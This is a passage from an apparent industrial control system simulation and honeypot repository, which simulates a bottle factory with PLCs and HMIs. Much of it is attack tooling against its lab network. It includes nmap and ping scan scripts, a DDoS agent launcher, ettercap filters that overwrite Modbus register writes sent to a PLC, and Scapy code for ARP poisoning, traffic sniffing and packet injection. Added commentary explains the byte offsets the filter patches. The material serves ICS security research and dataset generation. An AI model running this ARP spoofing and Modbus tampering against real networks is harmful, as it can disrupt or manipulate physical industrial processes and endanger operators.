2 | Nmap scan report for alireza-virtual-machine (192.168.0.1)
3 | Host is up (0.000013s latency).
4 | All 65535 scanned ports on alireza-virtual-machine (192.168.0.1) are in ignored states.
5 | Not shown: 65535 closed tcp ports (reset)
6 | MAC Address: 02:42:74:84:89:5E (Unknown)
7 |
8 | Nmap scan report for plc1.icsnet (192.168.0.11)
9 | Host is up (0.000026s latency).
10 | Not shown: 65534 closed tcp ports (reset)
11 | PORT STATE SERVICE
12 | 502/tcp open mbap
13 | MAC Address: 02:42:C0:A8:00:0B (Unknown)
14 |
15 | Nmap scan report for plc2.icsnet (192.168.0.12)
16 | Host is up (0.000026s latency).
17 | Not shown: 65534 closed tcp ports (reset)
18 | PORT STATE SERVICE
19 | 502/tcp open mbap
20 | MAC Address: 02:42:C0:A8:00:0C (Unknown)
21 |
22 | Nmap scan report for hmi1.icsnet (192.168.0.21)
23 | Host is up (0.000019s latency).
24 | All 65535 scanned ports on hmi1.icsnet (192.168.0.21) are in ignored states.
25 | Not shown: 65535 closed tcp ports (reset)
26 | MAC Address: 02:42:C0:A8:00:15 (Unknown)
27 |
28 | Nmap scan report for hmi2.icsnet (192.168.0.22)
29 | Host is up (0.000011s latency).
30 | All 65535 scanned ports on hmi2.icsnet (192.168.0.22) are in ignored states.
31 | Not shown: 65535 closed tcp ports (reset)
32 | MAC Address: 02:42:C0:A8:00:16 (Unknown)
33 |
34 | Nmap scan report for hmi3.icsnet (192.168.0.23)
35 | Host is up (0.000011s latency).
36 | All 65535 scanned ports on hmi3.icsnet (192.168.0.23) are in ignored states.
37 | Not shown: 65535 closed tcp ports (reset)
38 | MAC Address: 02:42:C0:A8:00:17 (Unknown)
39 |
40 | Nmap scan report for attacker.icsnet (192.168.0.42)
41 | Host is up (0.000011s latency).
42 | All 65535 scanned ports on attacker.icsnet (192.168.0.42) are in ignored states.
43 | Not shown: 65535 closed tcp ports (reset)
44 | MAC Address: 02:42:C0:A8:00:2A (Unknown)
45 |
46 | Nmap scan report for 6b609fb979b2 (192.168.0.41)
47 | Host is up (0.0000060s latency).
48 | All 65535 scanned ports on 6b609fb979b2 (192.168.0.41) are in ignored states.
49 | Not shown: 65535 closed tcp ports (reset)
50 |
51 | # Nmap done at Tue Sep 20 17:10:29 2022 -- 255 IP addresses (8 hosts up) scanned in 14.21 seconds
52 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/log-scan-scapy.txt:
--------------------------------------------------------------------------------
1 | # Found 7 in the network 192.168.0.1/24:
2 | IP:192.168.0.1 MAC:02:42:74:84:89:5e
3 | IP:192.168.0.11 MAC:02:42:c0:a8:00:0b
4 | IP:192.168.0.12 MAC:02:42:c0:a8:00:0c
5 | IP:192.168.0.21 MAC:02:42:c0:a8:00:15
6 | IP:192.168.0.22 MAC:02:42:c0:a8:00:16
7 | IP:192.168.0.23 MAC:02:42:c0:a8:00:17
8 | IP:192.168.0.42 MAC:02:42:c0:a8:00:2a
9 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/ddos.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #log-dir = $1
3 | #log-file = $2
4 | sudo chmod 777 $1
5 | echo "">$2
6 | python3 DDosAgent.py 'A' &
7 | python3 DDosAgent.py 'B' &
8 | python3 DDosAgent.py 'C' &
9 | python3 DDosAgent.py 'D' &
10 | #python3 DDosAgent.py 'E' &
11 | #python3 DDosAgent.py 'F' &
12 | #python3 DDosAgent.py 'G' &
13 | #python3 DDosAgent.py 'H' &
14 | #python3 DDosAgent.py 'I' &
15 | python3 DDosAgent.py 'J'
16 |
17 | sudo chmod 777 $2
18 |
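Note: ddos.sh backgrounds four agents with `&` and runs the last one in the foreground, so the script only blocks on agent 'J'. The same fan-out/join pattern can be sketched in Python; `flood_worker` below is a hypothetical stand-in for whatever loop DDosAgent.py actually runs, not the real implementation:

```python
from multiprocessing import Process


def flood_worker(agent_id: str) -> None:
    # placeholder for the request-flood loop each DDoS agent would run
    print(f"agent {agent_id} running")


if __name__ == "__main__":
    agents = [Process(target=flood_worker, args=(aid,)) for aid in "ABCDJ"]
    for p in agents:
        p.start()   # like backgrounding each agent with '&'
    for p in agents:
        p.join()    # unlike the script, this waits for every agent, not just the last
```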
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm-ettercap.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | cd attacks/mitm
5 | chmod 777 .
6 |
7 | etterfilter mitm.ecf -o mitm.ef
8 | ettercap -Tqi eth0 -F mitm.ef -w ettercap-packets.pcap -M arp /192.168.0.11// /192.168.0.22//
9 | #ettercap -Tqi eth0 -w ettercap-packets.pcap -F mitm.ef -M arp /192.168.0.11// /192.168.0.22//
10 |
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack mitm --timeout 30 --parameter 0.1 --destination '192.168.0.1/24'
6 | #sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack mitm --mode 'link' --timeout 15 --parameter 0.2 --destination '192.168.0.11,192.168.0.21'
7 | #sudo python3 Replay.py
8 | echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
9 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/ettercap-packets.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/attacks/mitm/ettercap-packets.pcap
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm (copy).ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502 && DATA.data + 6 == "\x01" && DATA.data + 7 == "\x10") {
3 | DATA.data + 15 ="\x9c\x40";
4 | msg("Replaced");
5 |
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm-INT-42.ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502) {
3 | DATA.data + 4 = "YYZZ";
4 | msg("Replaced");
5 |
6 | }
7 | }
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.ecf:
--------------------------------------------------------------------------------
1 | if (ip.src == '192.168.0.22' && ip.dst == '192.168.0.11') {
2 | if (ip.proto == TCP && tcp.dst == 502 && DATA.data + 6 == "\x01" && DATA.data + 7 == "\x10") {
3 | DATA.data + 15 ="\x9c\x40";
4 | msg("Replaced3");
5 | }
6 | }
7 |
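Note: the offsets the filter above tests and patches line up with standard Modbus/TCP framing (ettercap's DATA.data starts at the TCP payload). The sketch below is illustrative only — the register address and the 0x1234 value are made up, and which register offset 15 actually lands on depends on how the HMI encodes its write:

```python
import struct

# Example Modbus/TCP "Write Multiple Registers" request payload.
frame = bytes.fromhex(
    "0001"  # transaction id
    "0000"  # protocol id (always 0 for Modbus/TCP)
    "000b"  # remaining length (11 bytes)
    "01"    # offset 6: unit id          -> DATA.data + 6 == "\x01"
    "10"    # offset 7: function 0x10    -> DATA.data + 7 == "\x10"
    "0001"  # starting register address (illustrative)
    "0002"  # register count
    "04"    # byte count
    "1234"  # first register value (illustrative)
    "9c40"  # offsets 15-16: bytes the filter overwrites with \x9c\x40
)

assert frame[6] == 0x01 and frame[7] == 0x10
print(struct.unpack(">H", frame[15:17])[0])  # the injected value, 0x9C40 = 40000
```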
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.ef:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/bottlefactory/src/attacks/mitm/mitm.ef
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/mitm/mitm.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | cd attacks/mitm
5 | chmod 777 .
6 |
7 | etterfilter mitm.ecf -o mitm.ef
8 | ettercap -Tqi eth0 -F mitm.ef -w ettercap-packets.pcap -M arp /192.168.0.11// /192.168.0.22//
9 | #ettercap -Tqi eth0 -w ettercap-packets.pcap -F mitm.ef -M arp /192.168.0.11// /192.168.0.22//
10 |
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/replay-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo chmod 777 $1
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack replay --mode 'network' --timeout 15 --parameter 3 --destination '192.168.0.1/24'
6 | #sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack replay --mode 'link' --timeout 15 --parameter 3 --destination '192.168.0.11,192.168.0.22'
7 | sudo chmod 777 $2
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-ettercap.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #cd src
3 | #log-dir = $1
4 | #log-file = $2
5 | sudo chmod 777 $1
6 |
7 | sudo -S ettercap -Tq -Q --save-hosts $2 -i eth0
8 | #sudo -S ettercap -Tq -Q --save-hosts ./../ics_sim/attacks/attack-logs/scan_ettercap.txt -i eth0
9 |
10 | sudo chmod 777 $2
11 |
12 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-nmap.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | #log-dir = $1
5 | #log-file = $2
6 | sudo chmod 777 $1
7 |
8 |
9 | nmap -p- -oN $2 192.168.0.1-255
10 |
11 | sudo chmod 777 $2
12 |
13 |
14 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #cd src
3 | #log-dir = $1
4 | #log-file = $2
5 | sudo chmod 777 $1
6 |
7 | x=1; while [ $x -lt "50" ]; do ping -W 1 -c 1 192.168.0.$x | grep "bytes from" | awk '{print $4 " up"}'; let x++; done > $2
8 |
9 | sudo chmod 777 $2
10 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/scan-scapy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo chmod 777 $1
5 | sudo python3 ics_sim/ScapyAttacker.py --output $2 --attack scan --timeout 10 --destination '192.168.0.1/24'
6 | sudo chmod 777 $2
7 |
8 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/Device.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 | import random
5 | from abc import ABC, abstractmethod
6 | from datetime import datetime
7 |
8 | from ics_sim.protocol import ProtocolFactory
9 | from ics_sim.configs import SpeedConfig
10 | from ics_sim.helper import current_milli_time, validate_type, current_milli_cycle_time
11 | from ics_sim.connectors import ConnectorFactory
12 |
13 | from multiprocessing import Process
14 | import logging
15 |
16 |
17 | class Physics(ABC):
18 | @abstractmethod
19 | def __init__(self, connection):
20 | self._connector = ConnectorFactory.build(connection)
21 | pass
22 |
23 | def _set(self, tag, value):
24 | return self._connector.set(tag, value)
25 |
26 | def _get(self, tag):
27 | return self._connector.get(tag)
28 |
29 |
30 | class SensorConnector(Physics):
31 | def __init__(self, connection):
32 | super().__init__(connection)
33 | self._sensors = {}
34 |
35 | def add_sensor(self, tag, fault):
36 | self._sensors[tag] = fault
37 |
38 | def read(self, tag):
39 | if tag in self._sensors.keys():
40 | value = self._get(tag)
41 | value += random.uniform(value, -1 * value) * self._sensors[tag]
42 | return value
43 | else:
44 | raise LookupError()
45 |
46 |
47 | class ActuatorConnector(Physics):
48 | def __init__(self, connection):
49 | super().__init__(connection)
50 | self._actuators = list()
51 |
52 | def add_actuator(self, tag):
53 | self._actuators.append(tag)
54 |
55 | def write(self, tag, value):
56 | if tag in self._actuators:
57 | self._set(tag, value)
58 | else:
59 | raise LookupError()
60 |
61 |
62 | class Runnable(ABC):
63 | COLOR_RED = '\033[91m'
64 | COLOR_GREEN = '\033[92m'
65 | COLOR_BLUE = '\033[94m'
66 | COLOR_CYAN = '\033[96m'
67 | COLOR_YELLOW = '\033[93m'
68 | COLOR_BOLD = '\033[1m'
69 | COLOR_PURPLE = '\033[35m'
70 |
71 | def __init__(self, name, loop):
72 | validate_type(name, 'name', str)
73 | validate_type(loop, 'loop cycle', int)
74 |
75 | self.__name = name
76 | self.__loop_cycle = loop
77 |
78 | self.__loop_process = Process(target=self.__do_loop, args=())
79 | self._last_loop_time = 0
80 | self._current_loop_time = 0
81 | self._start_time = 0
82 | self._last_logic_start = 0
83 | self._last_logic_end = 0
84 | self._initialize_logger()
85 | self.__clear_scr = False
86 | self._std = sys.stdin.fileno()
87 |
88 | self.report("Created", logging.INFO)
89 |
90 | def _initialize_logger(self):
91 | self._logger = self.setup_logger(
92 | "logs-" + self.name(),
93 | logging.Formatter('%(asctime)s %(levelname)s %(message)s')
94 | )
95 |
96 | def _set_clear_scr(self, value):
97 | self.__clear_scr = value
98 |
99 | def _set_logger_level(self, level=logging.DEBUG):
100 | self._logger.setLevel(level)
101 |
102 | def setup_logger(self, name, format_str, level=logging.INFO, file_dir="./logs", file_ext=".log", write_mode="w"):
103 | """Set up a dedicated logger that writes its records to a file under file_dir."""
111 | file_path = os.path.join(file_dir, name) + file_ext
112 | handler = logging.FileHandler(file_path, mode=write_mode)
113 | handler.setFormatter(format_str)
114 |
116 | logger = logging.getLogger(name)
119 | logger.setLevel(level)
120 | logger.addHandler(handler)
121 | return logger
122 |
123 | def name(self):
124 | return self.__name
125 |
126 | def start(self):
127 | self.__loop_process.start()
128 |
129 | def stop(self):
130 | self._before_stop()
131 | self.__loop_process.terminate()
132 | self._after_stop()
133 | self.report("stopped", logging.INFO)
134 |
135 | def _after_stop(self):
136 | pass
137 |
138 | def _before_stop(self):
139 | pass
140 |
141 | def __do_loop(self):
142 | try:
143 | self.report("started", logging.INFO)
144 | self._before_start()
145 |
146 | self._start_time = self._current_loop_time = current_milli_cycle_time(self.__loop_cycle)
147 | while True:
148 |
149 | self._last_loop_time = self._current_loop_time
150 | wait = self._last_loop_time + self.__loop_cycle - current_milli_time()
151 |
152 | if wait > 0:
153 | time.sleep(wait / 1000)
154 |
155 |
156 | self._current_loop_time = current_milli_cycle_time(self.__loop_cycle)
157 | self._last_logic_start = current_milli_time()
158 |
159 | self._pre_logic_update()
160 | self._logic()
161 | self._last_logic_end = current_milli_time()
162 | self._post_logic_update()
163 | except Exception as e:
164 | self.report(str(e), logging.FATAL)
165 | raise e
171 |
172 | def _before_start(self):
173 | sys.stdin = os.fdopen(self._std)
174 |
175 | @abstractmethod
176 | def _logic(self):
177 | pass
178 |
179 | def _post_logic_update(self):
180 | pass
181 |
182 | def _pre_logic_update(self):
183 | if self.__clear_scr:
184 | os.system('clear')
185 |
186 | def get_loop_latency(self):
187 | return self._last_logic_start - self._last_loop_time - self.__loop_cycle
188 |
189 | def get_alive_time(self):
190 | return self._current_loop_time - self._start_time
191 |
192 | def get_logic_execution_time(self):
193 | return self._last_logic_end - self._last_logic_start
194 |
195 | def report(self, msg, level=logging.NOTSET):
196 | name_msg = "[{}] {}".format(self.name(), msg)
197 |
198 | if level == logging.NOTSET:
199 | self.__show_console(msg)
200 |
201 | elif level == logging.DEBUG:
202 | self._logger.debug(name_msg)
203 | self.__show_console(self._make_text("[DEBUG] " + msg, self.COLOR_CYAN))
204 |
205 | elif level == logging.INFO:
206 | self._logger.info(name_msg)
207 | self.__show_console(self._make_text("[INFO] " + msg, self.COLOR_GREEN))
208 |
209 | elif level == logging.WARNING or level == logging.WARN:
210 | self._logger.warning(name_msg)
211 | self.__show_console(self._make_text("[WARNING] " + msg, self.COLOR_YELLOW))
212 |
213 | elif level == logging.ERROR:
214 | self._logger.error(name_msg)
215 | self.__show_console(self._make_text("[ERROR] " + msg, self.COLOR_RED))
216 |
217 | elif level == logging.FATAL or level == logging.CRITICAL:
218 | self._logger.fatal(name_msg)
219 | self.__show_console(self._make_text("[FATAL] " + msg, self.COLOR_RED))
220 |
221 | def __show_console(self, msg):
222 | timestamp = self._make_text(datetime.now().strftime("%H:%M:%S"), self.COLOR_PURPLE)
223 | name = self._make_text(self.name(), self.COLOR_CYAN)
224 | print('[{} - {}]\t{}'.format(name, timestamp, msg), flush=True)
225 |
226 | @staticmethod
227 | def _make_text(msg, color):
228 | return color + msg + '\033[0m'
229 |
230 | class HIL(Runnable, Physics, ABC):
231 | @abstractmethod
232 | def __init__(self, name, connection, loop=SpeedConfig.DEFAULT_FP_PERIOD_MS):
233 | Runnable.__init__(self, name, loop)
234 | Physics.__init__(self, connection)
235 |
236 |
237 | class DcsComponent(Runnable):
238 | def __init__(self, name, tags, plcs, loop):
239 | Runnable.__init__(self, name, loop)
240 | self.plcs = plcs
241 | self.tags = tags
242 | self.clients = {}
243 | self.__init_clients()
244 |
245 | def __init_clients(self):
246 | for plc_id in self.plcs:
247 | plc = self.plcs[plc_id]
248 | self.clients[plc_id] = (ProtocolFactory.create_client(plc['protocol'], plc['ip'], plc['port']))
249 |
250 | def _send(self, tag, value):
251 | tag_id = self.tags[tag]['id']
252 | plc_id = self.tags[tag]['plc']
253 | self.clients[plc_id].send(tag_id, value)
254 |
255 | def _receive(self, tag):
256 |
257 | tag_id = self.tags[tag]['id']
258 | plc_id = self.tags[tag]['plc']
259 |
260 | return self.clients[plc_id].receive(tag_id)
261 |
262 | def _is_input_tag(self, tag):
263 | return self.tags[tag]['type'] == 'input'
264 |
265 | def _is_output_tag(self, tag):
266 | return self.tags[tag]['type'] == 'output'
267 |
268 | def _get_tag_id(self, tag):
269 | return self.tags[tag]['id']
270 |
271 | def _get_tag_fault(self, tag):
272 | return self.tags[tag]['fault']
273 |
274 |
275 | class PLC(DcsComponent):
276 | @abstractmethod
277 | def __init__(self,
278 | plc_id,
279 | sensor_connector,
280 | actuator_connector,
281 | tags,
282 | plcs,
283 | loop=SpeedConfig.DEFAULT_PLC_PERIOD_MS):
284 |
285 | name = plcs[plc_id]['name']
286 | DcsComponent.__init__(self, name, tags, plcs, loop)
287 | self._sensor_connector = sensor_connector
288 | self._actuator_connector = actuator_connector
289 |
290 | self.id = plc_id
291 | self.ip = plcs[plc_id]['ip']
292 | self.port = plcs[plc_id]['port']
293 | self.protocol = plcs[plc_id]['protocol']
294 |
295 | self.__init_sensors()
296 | self.__init_actuators()
297 |
298 | self.server = ProtocolFactory.create_server(self.protocol, self.ip, self.port)
299 | self.report('creating the server on IP = {}:{}'.format(self.ip, self.port), logging.INFO)
300 |
301 | self._snapshot_recorder = self.setup_logger("snapshots_" + self.name(), logging.Formatter('%(message)s'), file_ext=".csv")
302 | self.__record_variables = False
303 |
304 | def set_record_variables(self, value):
305 | self.__record_variables = value
306 |
307 |
308 | def _post_logic_update(self):
309 | DcsComponent._post_logic_update(self)
310 | self._store_received_values()
311 | if self.__record_variables:
312 | self._record_variables()
313 |
314 | def _store_received_values(self):
315 | for tag_name, tag_data in self.tags.items():
316 | if not self._is_local_tag(tag_name):
317 | continue
318 |
319 | if tag_data['type'] == 'output':
320 | self._set(tag_name, self.server.get(tag_data['id']))
321 | elif tag_data['type'] == 'input':
322 | self.server.set(tag_data['id'], self._get(tag_name))
323 |
324 | def _record_variables(self, header=False):
325 | snapshot = ""
326 |
327 | if header:
328 | snapshot += "time, current_loop, loop_latency, logic_execution_time, "
329 | else:
330 | snapshot += "{}, {}, {}, {}, ".format(
331 | datetime.now(),
332 | self._current_loop_time,
333 | self.get_loop_latency(),
334 | self.get_logic_execution_time()
335 | )
336 |
337 | for tag_name, tag_data in self.tags.items():
338 | if not self._is_local_tag(tag_name):
339 | continue
340 | if header:
341 | snapshot += "{}({}), ".format(tag_name, tag_data['id'])
342 | else:
343 | snapshot += "{}, ".format(self._get(tag_name))
344 |
345 | self._snapshot_recorder.info(snapshot)
346 |
347 | def __init_sensors(self):
348 | for tag in self.tags:
349 | if self._is_input_tag(tag):
350 | self._sensor_connector.add_sensor(tag, self._get_tag_fault(tag))
351 |
352 | def __init_actuators(self):
353 | for tag in self.tags:
354 | if self._is_output_tag(tag):
355 | self._actuator_connector.add_actuator(tag)
356 |
357 | def _get(self, tag):
358 | if self._is_local_tag(tag):
359 |
360 | if self._is_input_tag(tag):
361 | return self._sensor_connector.read(tag)
362 | else:
363 | return self.server.get(self._get_tag_id(tag))
364 | else:
365 | try:
366 | return self._receive(tag)
367 | except Exception as e:
368 | self.report('received no value for tag: {}'.format(tag), logging.WARNING)
369 | return -1
370 |
371 | def _set(self, tag, value):
372 | if self._is_local_tag(tag):
373 | self.server.set(self._get_tag_id(tag), value)
374 | return self._actuator_connector.write(tag, value)
375 | else:
376 | self._send(tag, value)
377 |
378 |
379 | def _is_local_tag(self, tag):
380 | return self.tags[tag]['plc'] == self.id
381 |
382 | def _before_start(self):
383 | self.server.start()
384 | for tag, value in self.tags.items():
385 | if self._is_output_tag(tag) and self._is_local_tag(tag):
386 | self._set(tag, value['default'])
387 | self._record_variables(True)
388 |
389 | def stop(self):
390 | self.server.stop()
391 | DcsComponent.stop(self)
392 |
393 | def _check_manual_input(self, control_tag, actuator_tag):
394 |
395 | mode = self._get(control_tag)
396 |
397 | if mode == 1:
398 | self._set(actuator_tag, 0)
399 | return True
400 | elif mode == 2:
401 | self._set(actuator_tag, 1)
402 | return True
403 | return False
404 |
405 |
406 | class HMI(DcsComponent):
407 | def __init__(self, name, tags, plcs, loop=SpeedConfig.DEFAULT_PLC_PERIOD_MS):
408 | DcsComponent.__init__(self, name, tags, plcs, loop)
409 |
410 | def _before_start(self):
411 | DcsComponent._before_start(self)
412 | self._set_clear_scr(True)
413 |
414 | def _logic(self):
415 | self._display()
416 | self._operate()
417 |
418 | def _display(self):
419 | pass
420 |
421 | def _operate(self):
422 | pass
423 |
424 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ModbusCommand.py:
--------------------------------------------------------------------------------
1 | from protocol import ClientModbus
2 |
3 |
4 | class ModbusCommand:
5 | clients = dict()
6 |
7 | command_write_multiple_registers = 16
8 | command_read_holding_registers = 3
9 |
10 | def __init__(self, sip, dip, port, command, address, value, new_value, time, word_num=2):
11 | self.sip = sip
12 | self.dip = dip
13 | self.port = port
14 | self.command = command
15 | self.address = address
16 | self.tag = int(address / word_num)
17 | self.value = value
18 | self.time = time
19 | self.new_value = new_value
20 |
21 | def __str__(self):
22 | return 'sip:{} dip:{} port:{} command:{} address:{} value:{} new_value:{} time:{}'.format(
23 | self.sip, self.dip, self.port, self.command, self.address, self.value, self.new_value, self.time)
24 |
25 | def send_fake(self):
26 | if (self.dip, self.port) not in ModbusCommand.clients:
27 | ModbusCommand.clients[(self.dip, self.port)] = ClientModbus(self.dip, self.port)
28 |
29 | client = ModbusCommand.clients[(self.dip, self.port)]
30 |
31 | if self.command == ModbusCommand.command_read_holding_registers:
32 | client.receive(self.tag)
33 |
34 | if self.command == ModbusCommand.command_write_multiple_registers:
35 | client.send(self.tag, self.value)
36 |
37 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ModbusPackets.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 |
3 |
4 | class ModbusTCP(Packet):
5 | name = "modbus_tcp"
6 | fields_desc = [ShortField("TransID", 0),
7 | ShortField("ProtocolID", 0),
8 | ShortField("Length", 0),
9 | ByteField("UnitID", 0)
10 | ]
11 |
12 |
13 | class ModbusWriteRequest(Packet):
14 | name = "modbus_tcp_write"
15 | fields_desc = [ByteField("Command", 0),
16 | ShortField("Reference", 0),
17 | ShortField("WordCnt", 0),
18 | ByteField("ByteCnt", 0),
19 | ShortField("Data0", 0),
20 | ShortField("Data1", 0),
21 | ]
22 |
23 |
24 | class ModbusReadRequestOrWriteResponse(Packet):
25 | name = "modbus_tcp_read_request"
26 | fields_desc = [ByteField("Command", 0),
27 | ShortField("Reference", 0),
28 | ShortField("WordCnt", 0),
29 | ]
30 |
31 |
32 | class ModbusReadResponse(Packet):
33 | name = "modbus_tcp_read_response"
34 | fields_desc = [ByteField("Command", 0),
35 | ByteField("ByteCnt", 0),
36 | ShortField("Data0", 0),
37 | ShortField("Data1", 0),
38 | ]
39 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/NetworkNode.py:
--------------------------------------------------------------------------------
1 | class NetworkNode:
2 | def __init__(self, ip, mac):
3 | self.IP = ip
4 | self.MAC = mac
5 |
6 | def is_switch(self):
7 | return self.IP.split('.')[3] == '1'
8 |
9 | def __str__(self):
10 | return 'IP:{} MAC:{}'.format(self.IP, self.MAC)
11 |
--------------------------------------------------------------------------------
/bottlefactory/src/ics_sim/ScapyAttacker.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import logging, sys, time
3 | from datetime import datetime
4 | from scapy.layers.inet import IP
5 | from scapy.layers.l2 import ARP, Ether
6 |
7 | from ModbusPackets import *
8 | from NetworkNode import NetworkNode
9 | from ModbusCommand import ModbusCommand
10 | from protocol import ModbusBase
11 |
12 |
13 | class ScapyAttacker:
14 | ARP_MSG_CNT = 2
15 | BROADCAST_ADDRESS = "ff:ff:ff:ff:ff:ff"
16 |
17 | sniff_commands = []
18 | sniff_time = None
19 | error = 0
20 | modbus_base = ModbusBase()
21 |
22 | @staticmethod
23 | def discovery(dst):
24 | nodes = []
25 | ethernet_layer = Ether(dst=ScapyAttacker.BROADCAST_ADDRESS)
26 | arp_layer = ARP(pdst=dst)
27 | ans, un_ans = srp(ethernet_layer / arp_layer, timeout=ScapyAttacker.ARP_MSG_CNT)
28 |
29 | for sent, received in ans:
30 | nodes.append(NetworkNode(received[ARP].psrc, received[ARP].hwsrc))
31 | return nodes
32 |
33 | @staticmethod
34 | def get_mac_address(ip_address):
35 | pkt = Ether(dst=ScapyAttacker.BROADCAST_ADDRESS) / ARP(pdst=ip_address)
36 | answered, unanswered = srp(pkt, timeout=ScapyAttacker.ARP_MSG_CNT, verbose=0)
37 |
38 | for sent, received in answered:
39 | return received[ARP].hwsrc
40 |
41 | @staticmethod
42 | def poison_arp_table(src, dst):
43 | print("Poisoning {} <==> {} .... started".format(src.IP, dst.IP), end='')
44 | gateway_to_target = ARP(op=2, hwdst=src.MAC, psrc=dst.IP, pdst=src.IP)
45 | target_to_gateway = ARP(op=2, hwdst=dst.MAC, psrc=src.IP, pdst=dst.IP)
46 | try:
47 | send(gateway_to_target, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
48 | send(target_to_gateway, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
49 |
50 | except Exception as e:
51 | sys.exit()
52 |
53 | print("[DONE]")
54 |
55 | @staticmethod
56 | def poison_arp_tables(nodes):
57 | print("\n Group poisoning [started]...")
58 |
59 | try:
60 | for src in nodes:
61 | for dst in nodes:
62 | if src.is_switch() or dst.is_switch() or src.IP <= dst.IP:
63 | continue
64 | ScapyAttacker.poison_arp_table(src, dst)
65 |
66 | except Exception as e:
67 | sys.exit()
68 |
69 | print("Group poisoning [DONE]")
70 |
71 | @staticmethod
72 | def restore_arp_table(src, dst):
73 | print("Restoring... {} and {} .... started".format(src.IP, dst.IP), end='')
74 |
75 | dst_src_fix = ARP(op=2, hwsrc=dst.MAC, psrc=dst.IP, pdst=src.IP, hwdst=ScapyAttacker.BROADCAST_ADDRESS)
76 | arp_layer = ARP(op=2, hwsrc=src.MAC, psrc=src.IP, pdst=dst.IP, hwdst=ScapyAttacker.BROADCAST_ADDRESS)
77 | send(dst_src_fix, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
78 | send(arp_layer, count=ScapyAttacker.ARP_MSG_CNT, verbose=0)
79 | print("[DONE]")
80 |
81 | @staticmethod
82 | def restore_arp_tables(nodes):
83 | print("Group restoring [started]... ")
84 | for src in nodes:
85 | for dst in nodes:
86 | if src.is_switch() or dst.is_switch() or src.IP <= dst.IP:
87 | continue
88 |
89 | ScapyAttacker.restore_arp_table(src, dst)
90 | print("Group restoring [DONE] ")
91 |
92 | @staticmethod
93 | def sniff_callback(pkt):
94 | if not pkt['Ethernet'].dst.endswith(Ether().src):
95 | return
96 |
97 | if not pkt.haslayer('TCP') or len(pkt['TCP'].payload) <= 0:  # skip packets without a TCP payload
98 | return
99 |
100 | tcp_packet = ModbusTCP(pkt['TCP'].payload.load)
101 | if tcp_packet.Length == 6 or tcp_packet.Length == 11:
102 | if tcp_packet.Length == 6:
103 | modbus_packet = ModbusReadRequestOrWriteResponse(tcp_packet.payload.load)
104 | value = 0
105 | if modbus_packet.Command == ModbusCommand.command_write_multiple_registers:
106 | return
107 | else: # tcp_packet.Length == 11:
108 | modbus_packet = ModbusWriteRequest(tcp_packet.payload.load)
109 | value = ScapyAttacker.modbus_base.decode([modbus_packet.Data0, modbus_packet.Data1])
110 |
111 | command = ModbusCommand(
112 | pkt['IP'].src,
113 | pkt['IP'].dst,
114 | pkt['TCP'].dport,
115 | modbus_packet.Command,
116 | modbus_packet.Reference,
117 | value,
118 | value,
119 | datetime.now().timestamp()
120 | )
121 |
122 | ScapyAttacker.sniff_commands.append(command)
123 | print('*', end='')
124 |
125 | @staticmethod
126 | def inject_callback(pkt):
127 |
128 | if not pkt['Ethernet'].dst.endswith(Ether().src):
129 | return
130 |
131 | if not pkt.haslayer('IP'):
132 | return
133 |
134 | new_packet = IP(dst=pkt['IP'].dst, src=pkt['IP'].src)
135 | new_packet['IP'].payload = pkt['IP'].payload
136 |
137 | if new_packet.haslayer('TCP') and len(new_packet['TCP'].payload) > 0:
